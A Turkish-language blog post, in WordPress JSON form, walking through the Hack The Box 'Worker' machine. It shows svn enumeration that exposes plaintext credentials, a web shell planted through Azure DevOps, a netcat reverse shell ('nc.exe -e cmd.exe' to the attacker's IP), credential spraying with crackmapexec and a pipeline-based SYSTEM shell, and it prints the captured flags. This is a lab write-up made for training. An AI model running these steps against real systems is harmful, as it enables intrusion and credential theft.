{"id":1479,"date":"2021-08-11T08:50:13","date_gmt":"2021-08-11T08:50:13","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1479"},"modified":"2021-08-11T09:37:38","modified_gmt":"2021-08-11T09:37:38","slug":"worker","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/11\/worker\/","title":{"rendered":"Worker"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/270\" title=\"Worker\">Worker<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/13358d0b09074485f107f36625b50a5c.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPORT     STATE SERVICE  VERSION\n80\/tcp   open  http     Microsoft IIS httpd 10.0\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n|_http-server-header: Microsoft-IIS\/10.0\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n3690\/tcp open  svnserve Subversion\n5985\/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows<\/code><\/pre>\n<p>svn tespit ettikten sonra enum yapmaya ba\u015flad\u0131m ayn\u0131 zamanda vsman a\u00e7\u0131k bu bir kullan\u0131c\u0131 tespit edebilirsek ba\u011flant\u0131 kurabilece\u011fimiz anlam\u0131na geliyor. svn olmas\u0131 ile bir yaz\u0131l\u0131m projesi olabilece\u011fini bende d\u00fc\u015f\u00fcnd\u00fcrd\u00fc. svn ile ilgili incelemelerim a\u015fa\u011f\u0131da<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn ls svn:\/\/10.10.10.203\ndimension.worker.htb\/\nmoved.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn log svn:\/\/10.10.10.203\n------------------------------------------------------------------------\nr5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line\n\nAdded note that repo has been migrated\n------------------------------------------------------------------------\nr4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line\n\nMoving this repo to our new devops server which will handle the deployment for us\n------------------------------------------------------------------------\nr3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line\n\n-\n------------------------------------------------------------------------\nr2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line\n\nAdded deployment script\n------------------------------------------------------------------------\nr1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line\n\nFirst version\n------------------------------------------------------------------------\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn checkout svn:\/\/10.10.10.203\nA    dimension.worker.htb\nA    dimension.worker.htb\/LICENSE.txt\nA    dimension.worker.htb\/README.txt\nA    dimension.worker.htb\/assets\nA    dimension.worker.htb\/assets\/css\nA    dimension.worker.htb\/assets\/css\/fontawesome-all.min.css\nA    dimension.worker.htb\/assets\/css\/main.css\nA    dimension.worker.htb\/assets\/css\/noscript.css\nA    dimension.worker.htb\/assets\/js\nA    dimension.worker.htb\/assets\/js\/breakpoints.min.js\nA    dimension.worker.htb\/assets\/js\/browser.min.js\nA    dimension.worker.htb\/assets\/js\/jquery.min.js\nA    dimension.worker.htb\/assets\/js\/main.js\nA    dimension.worker.htb\/assets\/js\/util.js\nA    dimension.worker.htb\/assets\/sass\nA    dimension.worker.htb\/assets\/sass\/base\nA    dimension.worker.htb\/assets\/sass\/base\/_page.scss\nA    dimension.worker.htb\/assets\/sass\/base\/_reset.scss\nA    dimension.worker.htb\/assets\/sass\/base\/_typography.scss\nA    dimension.worker.htb\/assets\/sass\/components\nA    dimension.worker.htb\/assets\/sass\/components\/_actions.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_box.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_button.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_form.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_icon.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_icons.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_image.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_list.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_table.scss\nA    dimension.worker.htb\/assets\/sass\/layout\nA    dimension.worker.htb\/assets\/sass\/layout\/_bg.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_footer.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_header.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_main.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_wrapper.scss\nA    dimension.worker.htb\/assets\/sass\/libs\nA    dimension.worker.htb\/assets\/sass\/libs\/_breakpoints.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_functions.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_mixins.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_vars.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_vendor.scss\nA    dimension.worker.htb\/assets\/sass\/main.scss\nA    dimension.worker.htb\/assets\/sass\/noscript.scss\nA    dimension.worker.htb\/assets\/webfonts\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.eot\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.svg\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.ttf\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.woff\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.woff2\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.eot\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.svg\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.ttf\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.woff\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.woff2\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.eot\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.svg\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.ttf\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.woff\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.woff2\nA    dimension.worker.htb\/images\nA    dimension.worker.htb\/images\/bg.jpg\nA    dimension.worker.htb\/images\/overlay.png\nA    dimension.worker.htb\/images\/pic01.jpg\nA    dimension.worker.htb\/images\/pic02.jpg\nA    dimension.worker.htb\/images\/pic03.jpg\nA    dimension.worker.htb\/index.html\nA    moved.txt\nChecked out revision 5.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# s                              \ns: command not found\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# ls                                                                                                                                                                                                                                  127 \u2a2f\n10.10.10.203  dimension.worker.htb  gobuster1  gobuster2  moved.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# cat moved.txt       \nThis repository has been migrated and will no longer be maintaned here.\nYou can find the latest version at: http:\/\/devops.worker.htb\n\n\/\/ The Worker team :)\n<\/code><\/pre>\n<p>\/etc\/hosts dosyam\u0131 g\u00fcncellendikten sonra svn'deki di\u011fer versiyonlar\u0131 kontrol edereke devam etmeye ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/dimension.worker.htb]\n\u2514\u2500# cd ..                  \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn up -r 2\nUpdating &#039;.&#039;:\nD    moved.txt\nA    deploy.ps1\nUpdated to revision 2.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# ls -al        \ntotal 32\ndrwxr-xr-x  5 root root 4096 Aug 10 06:31 .\ndrwxr-xr-x 26 root root 4096 Aug 10 05:10 ..\ndrwxr-xr-x  4 root root 4096 Aug 10 05:28 10.10.10.203\n-rw-r--r--  1 root root  271 Aug 10 06:31 deploy.ps1\ndrwxr-xr-x  4 root root 4096 Aug 10 06:19 dimension.worker.htb\n-rw-r--r--  1 root root 1065 Aug 10 06:19 gobuster1\n-rw-r--r--  1 root root 1093 Aug 10 06:21 gobuster2\ndrwxr-xr-x  4 root root 4096 Aug 10 06:18 .svn\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# cat deploy.ps1 \n$user = &quot;nathen&quot; \n$plain = &quot;wendel98&quot;\n$pwd = ($plain | ConvertTo-SecureString)\n$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd\n$args = &quot;Copy-Site.ps1&quot;\nStart-Process powershell.exe -Credential $Credential -ArgumentList (&quot;-file $args&quot;)\n<\/code><\/pre>\n<p>Harika bir kullan\u0131c\u0131 tespit ettik vsman'a ba\u011flanmay\u0131 denedim ancak ba\u015far\u0131l\u0131 olamad\u0131m. Bunun \u00fczerine <strong><a href=\"http:\/\/devops.worker.htb\">http:\/\/devops.worker.htb<\/a><\/strong> adresine gitti\u011fimde \u00e7\u0131kan basic authentication'a nathen:wendel98 bilgileri ile giri\u015f yapabildim. Sa\u011fl\u0131k bakanl\u0131\u011f\u0131nda yaz\u0131l\u0131mc\u0131 olarak \u00e7al\u0131\u015f\u0131rken s\u00fcre\u00e7 takibi i\u00e7in TFS kullan\u0131rd\u0131k. Microsoft'uy seviyorum ve Azur \u00fczerinde yine benzer bir TFS var. Tasklar gelmi\u015f bu tasklara uygun commitler girilmi\u015f. Amac\u0131m\u0131n bu projelerden birine reverse at\u0131p makineye ba\u011flant\u0131 kurmak oldu\u011fu \u00e7ok a\u00e7\u0131kt\u0131.<\/p>\n<p>Bir proje se\u00e7tim ve yeni bir branch olu\u015fturdum daha sonras\u0131nda bunu merge ettim b\u00f6ylece web shel'imi y\u00fckleyebildim. Bununla alakal\u0131 ekran g\u00f6r\u00fcn\u00fcs\u00fc a\u015fa\u011f\u0131da yer almaktad\u0131r.<\/p>\n<div aling=\"center\">\n<img decoding=\"async\" src=\"http:\/\/144.76.171.171\/blog\/wp-content\/uploads\/2021\/08\/azur-tfs.png\" style=\"width:100%; height:auto;\">\n<\/div>\n<p>\u015eimdi web shelli g\u00f6r\u00fcnt\u00fcleyelim. Bunun i\u00e7in \/etc\/hosts dosyam\u0131 tekrardan g\u00fcncelledim.<\/p>\n<div aling=\"center\">\n<img decoding=\"async\" src=\"http:\/\/144.76.171.171\/blog\/wp-content\/uploads\/2021\/08\/azur-webshell.png\" style=\"width:100%; height:auto;\">\n<\/div>\n<p>Kalimde bir smb ba\u015flatt\u0131m ve kar\u015f\u0131 makineye nc.exe att\u0131m. Daha sonras\u0131nda reverse ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# \/usr\/local\/bin\/smbserver.py KUDAY . -smb2support                                                                                                                                                                                    130 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n[*] Incoming connection (10.10.10.203,52693)\n[*] AUTHENTICATE_MESSAGE (\\,WORKER)\n[*] User WORKER\\ authenticated successfully\n[*] :::00::aaaaaaaaaaaaaaaa\n[*] Connecting Share(1:IPC$)\n[*] Connecting Share(2:KUDAY)\n[*] Disconnecting Share(1:IPC$)\n[*] Disconnecting Share(2:KUDAY)\n[*] Closing down connection (10.10.10.203,52693)\n[*] Remaining connections []<\/code><\/pre>\n<p>nc.exe'yi g\u00f6ndermek i\u00e7in kulland\u0131\u011f\u0131m payload: <code>copy \\\\10.10.14.5\\KUDAY\\nc.exe C:\\Windows\\Temp\\nc.exe<\/code> <\/p>\n<pre><code class=\"language-sh\">C:\\Windows\\Temp\\nc.exe -e cmd.exe 10.10.14.5 443\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# nc -lvp 443 \nlistening on [any] 443 ...\nconnect to [10.10.14.5] from alpha.worker.htb [10.10.10.203] 52695\nMicrosoft Windows [Version 10.0.17763.1282]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nw:\\sites\\alpha.worker.htb&gt;<\/code><\/pre>\n<p>Bu a\u015famdan sonra \u00e7ok\u00e7a inceleme yapt\u0131m otomatik scriptleri kulland\u0131m ancak i\u015fe yarar bir \u015fey \u00e7\u0131kmad\u0131. Daha sonras\u0131nda w:\\ diskinde manuel incelemeler yapmaya ba\u015flad\u0131m. Powershell ba\u015flat\u0131m a\u015fa\u011f\u0131daki komutu girdi\u011fimde ilgin\u00e7 sonu\u00e7lar ald\u0131m.<\/p>\n<pre><code class=\"language-ps1\">Get-ChildItem -Recurse | Select-String &quot;pass&quot; -List | Select Path<\/code><\/pre>\n<pre><code>\n...\nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-regular-400.svg         \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-regular-400.ttf         \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-solid-900.eot           \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-solid-900.svg           \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-solid-900.ttf           \nW:\\svnrepos\\www\\conf\\passwd                                           \nW:\\svnrepos\\www\\conf\\svnserve.conf                                    \nW:\\svnrepos\\www\\db\\revs\\0\\1                                           \nW:\\svnrepos\\www\\db\\revs\\0\\3                                           \nW:\\svnrepos\\www\\hooks\\post-commit.tmpl                                \nW:\\svnrepos\\www\\hooks\\post-lock.tmpl                                  \nW:\\svnrepos\\www\\hooks\\post-revprop-change.tmpl                        \nW:\\svnrepos\\www\\hooks\\post-unlock.tmpl                                \nW:\\svnrepos\\www\\hooks\\pre-commit.tmpl                                 \nW:\\svnrepos\\www\\hooks\\pre-lock.tmpl                                   \nW:\\svnrepos\\www\\hooks\\pre-revprop-change.tmpl                         \nW:\\svnrepos\\www\\hooks\\pre-unlock.tmpl                                 \nW:\\svnrepos\\www\\hooks\\start-commit.tmpl   <\/code><\/pre>\n<p>passwd dosyas\u0131n\u0131 okudu\u011fumda kullan\u0131c\u0131 adlar\u0131 ve parolalar buldum. Hemen bunlar\u0131 test edelim.<\/p>\n<pre><code class=\"language-sh\">\nPS W:\\svnrepos\\www\\conf&gt; cat passwd\ncat passwd\n### This file is an example password file for svnserve.\n### Its format is similar to that of svnserve.conf. As shown in the\n### example below it contains one section labelled [users].\n### The name and password for each user follow, one account per line.\n\n[users]\nnathen = wendel98\nnichin = fqerfqerf\nnichin = asifhiefh\nnoahip = player\nnuahip = wkjdnw\noakhol = bxwdjhcue\nowehol = supersecret\npaihol = painfulcode\nparhol = gitcommit\npathop = iliketomoveit\npauhor = nowayjose\npayhos = icanjive\nperhou = elvisisalive\npeyhou = ineedvacation\nphihou = pokemon\nquehub = pickme\nquihud = kindasecure\nrachul = guesswho\nraehun = idontknow\nramhun = thisis\nranhut = getting\nrebhyd = rediculous\nreeinc = iagree\nreeing = tosomepoint\nreiing = isthisenough\nrenipr = dummy\nrhiire = users\nriairv = canyou\nricisa = seewhich\nrobish = onesare\nrobisl = wolves11\nrobive = andwhich\nronkay = onesare\nrubkei = the\nrupkel = sheeps\nryakel = imtired\nsabken = drjones\nsamken = aqua\nsapket = hamburger\nsarkil = friday<\/code><\/pre>\n<p>H\u0131zl\u0131ca wordlistlerimi olu\u015fturdum.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat cred       \nnathen = wendel98\nnichin = fqerfqerf\nnichin = asifhiefh\nnoahip = player\nnuahip = wkjdnw\noakhol = bxwdjhcue\nowehol = supersecret\npaihol = painfulcode\nparhol = gitcommit\npathop = iliketomoveit\npauhor = nowayjose\npayhos = icanjive\nperhou = elvisisalive\npeyhou = ineedvacation\nphihou = pokemon\nquehub = pickme\nquihud = kindasecure\nrachul = guesswho\nraehun = idontknow\nramhun = thisis\nranhut = getting\nrebhyd = rediculous\nreeinc = iagree\nreeing = tosomepoint\nreiing = isthisenough\nrenipr = dummy\nrhiire = users\nriairv = canyou\nricisa = seewhich\nrobish = onesare\nrobisl = wolves11\nrobive = andwhich\nronkay = onesare\nrubkei = the\nrupkel = sheeps\nryakel = imtired\nsabken = drjones\nsamken = aqua\nsapket = hamburger\nsarkil = friday\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat convert.py    \ndosya = open(&quot;cred&quot;)\ncred = dosya.read().split(&quot;\\n&quot;)\ndosya.close()\n\nusername=[]\npassword=[]\n\ndosya4username = open(&quot;username&quot;,&quot;a&quot;)\ndosya4password = open(&quot;password&quot;,&quot;a&quot;)\nfor i in cred:\n    dosya4username.write(i.replace(&quot;=&quot;,&quot; &quot;).split()[0]+&quot;\\n&quot;)\n    dosya4password.write(i.replace(&quot;=&quot;,&quot; &quot;).split()[1]+&quot;\\n&quot;)\ndosya4username.close()\ndosya4password.close()\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# python3 convert.py\nTraceback (most recent call last):\n  File &quot;\/root\/oscp\/htb\/Worker\/Users\/convert.py&quot;, line 11, in &lt;module&gt;\n    dosya4username.write(i.replace(&quot;=&quot;,&quot; &quot;).split()[0]+&quot;\\n&quot;)\nIndexError: list index out of range\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat username                                                                                                                                                        1 \u2a2f\nnathen\nnichin\nnichin\nnoahip\nnuahip\noakhol\nowehol\npaihol\nparhol\npathop\npauhor\npayhos\nperhou\npeyhou\nphihou\nquehub\nquihud\nrachul\nraehun\nramhun\nranhut\nrebhyd\nreeinc\nreeing\nreiing\nrenipr\nrhiire\nriairv\nricisa\nrobish\nrobisl\nrobive\nronkay\nrubkei\nrupkel\nryakel\nsabken\nsamken\nsapket\nsarkil\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat password \nwendel98\nfqerfqerf\nasifhiefh\nplayer\nwkjdnw\nbxwdjhcue\nsupersecret\npainfulcode\ngitcommit\niliketomoveit\nnowayjose\nicanjive\nelvisisalive\nineedvacation\npokemon\npickme\nkindasecure\nguesswho\nidontknow\nthisis\ngetting\nrediculous\niagree\ntosomepoint\nisthisenough\ndummy\nusers\ncanyou\nseewhich\nonesare\nwolves11\nandwhich\nonesare\nthe\nsheeps\nimtired\ndrjones\naqua\nhamburger\nfriday<\/code><\/pre>\n<p>Orada pythonda bir hata var ancak program\u0131n sonunda ger\u00e7ekle\u015fen bir durum, pythondan anlayabnlar anlayacakt\u0131r. Dosya okuma i\u015flemi yaparken son sat\u0131rda bo\u015f elemanlar olmas\u0131ndan kaynaklan\u0131yor. Korkulacak bir \u015fey yok. \u015eimdi deneyelim!<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# crackmapexec winrm  -u username -p password --no-bruteforce 10.10.10.203\nWINRM       10.10.10.203    5985   NONE             [*] None (name:10.10.10.203) (domain:None)\nWINRM       10.10.10.203    5985   NONE             [*] http:\/\/10.10.10.203:5985\/wsman\nWINRM       10.10.10.203    5985   NONE             [-] None\\nathen:wendel98\nWINRM       10.10.10.203    5985   NONE             [-] None\\nichin:fqerfqerf\nWINRM       10.10.10.203    5985   NONE             [-] None\\nichin:asifhiefh\nWINRM       10.10.10.203    5985   NONE             [-] None\\noahip:player\nWINRM       10.10.10.203    5985   NONE             [-] None\\nuahip:wkjdnw\nWINRM       10.10.10.203    5985   NONE             [-] None\\oakhol:bxwdjhcue\nWINRM       10.10.10.203    5985   NONE             [-] None\\owehol:supersecret\nWINRM       10.10.10.203    5985   NONE             [-] None\\paihol:painfulcode\nWINRM       10.10.10.203    5985   NONE             [-] None\\parhol:gitcommit\nWINRM       10.10.10.203    5985   NONE             [-] None\\pathop:iliketomoveit\nWINRM       10.10.10.203    5985   NONE             [-] None\\pauhor:nowayjose\nWINRM       10.10.10.203    5985   NONE             [-] None\\payhos:icanjive\nWINRM       10.10.10.203    5985   NONE             [-] None\\perhou:elvisisalive\nWINRM       10.10.10.203    5985   NONE             [-] None\\peyhou:ineedvacation\nWINRM       10.10.10.203    5985   NONE             [-] None\\phihou:pokemon\nWINRM       10.10.10.203    5985   NONE             [-] None\\quehub:pickme\nWINRM       10.10.10.203    5985   NONE             [-] None\\quihud:kindasecure\nWINRM       10.10.10.203    5985   NONE             [-] None\\rachul:guesswho\nWINRM       10.10.10.203    5985   NONE             [-] None\\raehun:idontknow\nWINRM       10.10.10.203    5985   NONE             [-] None\\ramhun:thisis\nWINRM       10.10.10.203    5985   NONE             [-] None\\ranhut:getting\nWINRM       10.10.10.203    5985   NONE             [-] None\\rebhyd:rediculous\nWINRM       10.10.10.203    5985   NONE             [-] None\\reeinc:iagree\nWINRM       10.10.10.203    5985   NONE             [-] None\\reeing:tosomepoint\nWINRM       10.10.10.203    5985   NONE             [-] None\\reiing:isthisenough\nWINRM       10.10.10.203    5985   NONE             [-] None\\renipr:dummy\nWINRM       10.10.10.203    5985   NONE             [-] None\\rhiire:users\nWINRM       10.10.10.203    5985   NONE             [-] None\\riairv:canyou\nWINRM       10.10.10.203    5985   NONE             [-] None\\ricisa:seewhich\nWINRM       10.10.10.203    5985   NONE             [-] None\\robish:onesare\nWINRM       10.10.10.203    5985   NONE             [+] None\\robisl:wolves11 (Pwn3d!)\n<\/code><\/pre>\n<pre><code>robisl:wolves11<\/code><\/pre>\n<p>Harika! evil-winrm ile ba\u011flant\u0131 kural\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# evil-winrm -i 10.10.10.203 -u robisl -p wolves11                                                                                                                                                                                    130 \u2a2f\n\nEvil-WinRM shell v2.4\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\robisl\\Documents&gt; cd ..\n*Evil-WinRM* PS C:\\Users\\robisl&gt; ls\n\n    Directory: C:\\Users\\robisl\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---         4\/5\/2020   7:32 PM                Desktop\nd-r---         4\/4\/2020  11:35 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n\ncd*Evil-WinRM* PS C:\\Users\\robisl&gt; cd Desktop\n*Evil-WinRM* PS C:\\Users\\robisl\\Desktop&gt; ls\n\n    Directory: C:\\Users\\robisl\\Desktop\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\n-ar---        8\/10\/2021   8:59 PM             34 user.txt\n\ncat*Evil-WinRM* PS C:\\Users\\robisl\\Desktop&gt; cat user.txt\n5455ed43a205185208157dcc76502d43\n*Evil-WinRM* PS C:\\Users\\robisl\\Desktop&gt; <\/code><\/pre>\n<p>Daha sonras\u0131nda bu kullan\u0131c\u0131 ile azur'a tekrar ba\u011fland\u0131m ve daha farkl\u0131 bir proeje g\u00f6rd\u00fcm. Pipelines olu\u015fturabildi\u011fimi fark ettim. Devops k\u0131sm\u0131 \u00e7ok hakim oldu\u011fum bir alan de\u011fil bunu ba\u015fta belirtmemde fayda var o y\u00fczden emin olmad\u0131\u011f\u0131m baz\u0131 \u015feylerden burada bahsetmeyece\u011fim. Pentester academy'nin e\u011fitimlerii bekliyorum \ud83d\ude42 Ancak piplines arac\u0131l\u0131\u011f\u0131 ile i\u015fletim sistemi seviyesinde kod \u00e7al\u0131\u015ft\u0131rabildi\u011fimi biliyorum. A\u015fa\u011f\u0131daki \u015fekilde bir kod \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131mda root haklar\u0131nda (s\u00f6z\u00fcm ona makine windows) reverse alabildim.<\/p>\n<div aling=\"center\">\n<img decoding=\"async\" src=\"http:\/\/144.76.171.171\/blog\/wp-content\/uploads\/2021\/08\/pipline.png\" style=\"width:100%; height:auto;\">\n<\/div>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# nc -lvp 443                                                                                                  1 \u2a2f\nlistening on [any] 443 ...\nconnect to [10.10.14.5] from devops.worker.htb [10.10.10.203] 50788\nMicrosoft Windows [Version 10.0.17763.1282]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nW:\\agents\\agent11\\_work\\8\\s&gt;whoami\nwhoami\nnt authority\\system\n\nW:\\agents\\agent11\\_work\\8\\s&gt;c:\nc:\n\nC:\\&gt;dir &quot;*root*.txt&quot; \/s \/p\ndir &quot;*root*.txt&quot; \/s \/p\n Volume in drive C has no label.\n Volume Serial Number is 32D6-9041\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n2021-08-10  20:59                34 root.txt\n               1 File(s)             34 bytes\n\n     Total Files Listed:\n               1 File(s)             34 bytes\n               0 Dir(s)  10\u00a0384\u00a0883\u00a0712 bytes free\n\nC:\\&gt;cd C:\\Users\\Administrator\\Desktop\ncd C:\\Users\\Administrator\\Desktop\n\nC:\\Users\\Administrator\\Desktop&gt;dtype root.txt\ndtype root.txt\n&#039;dtype&#039; is not recognized as an internal or external command,\noperable program or batch file.\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\nfdae81646ff993d7125b423f6fd93f8d\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Worker &#8211; HTB Orta Windows Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 80\/tcp open http Microsoft IIS httpd&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/11\/worker\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Worker<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[600,498,468],"tags":[602,601],"class_list":["post-1479","post","type-post","status-publish","format-standard","hentry","category-devops","category-walkthrough","category-windows","tag-azur","tag-devops","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1479"}],"version-history":[{"count":3,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1479\/revisions"}],"predecessor-version":[{"id":1486,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1479\/revisions\/1486"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}